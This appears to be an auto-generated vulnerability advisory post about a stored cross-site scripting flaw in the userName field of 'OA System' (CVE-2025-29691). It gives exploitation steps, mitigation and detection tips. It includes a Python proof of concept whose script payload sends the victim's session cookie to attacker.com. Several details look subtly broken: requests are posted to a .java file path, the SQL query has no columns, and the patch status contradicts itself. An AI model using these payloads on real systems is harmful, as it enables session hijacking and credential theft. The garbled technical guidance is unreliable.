Listen to this Post
How the CVE Works
CVE-2025-29691 is a stored XSS vulnerability in OA System versions before v2025.01.01. The flaw exists in the `userName` parameter of /login/LoginsController.java, where improper input sanitization allows attackers to inject malicious JavaScript or HTML payloads. When an admin views the compromised user profile, the payload executes in their browser session, enabling session hijacking, data theft, or privilege escalation. The attack requires no authentication, making it highly exploitable.
DailyCVE Form
Platform: OA System
Version: < v2025.01.01
Vulnerability: Stored XSS
Severity: Critical
Date: 05/29/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation:
1. Craft a malicious payload:
<script>alert(document.cookie)</script>
2. Inject via `userName` during registration/login:
POST /login/LoginsController.java HTTP/1.1 Host: target.com userName=<script>exfiltrate()</script>
Mitigation:
1. Patch: Upgrade to v2025.01.01.
2. Sanitize inputs:
String safeUserName = ESAPI.encoder().encodeForHTML(userName);
3. CSP Header:
Content-Security-Policy: default-src 'self'
Detection:
grep -r "userName" /var/www/oa-system/login/
Log Analysis:
SELECT FROM access_log WHERE request LIKE "%userName=%3Cscript%";
Exploit Code (PoC):
import requests
payload = "<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>"
requests.post("https://target.com/login", data={"userName": payload})
Post-Patch Verification:
curl -I https://target.com/login/LoginsController.java | grep "2025.01.01"
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
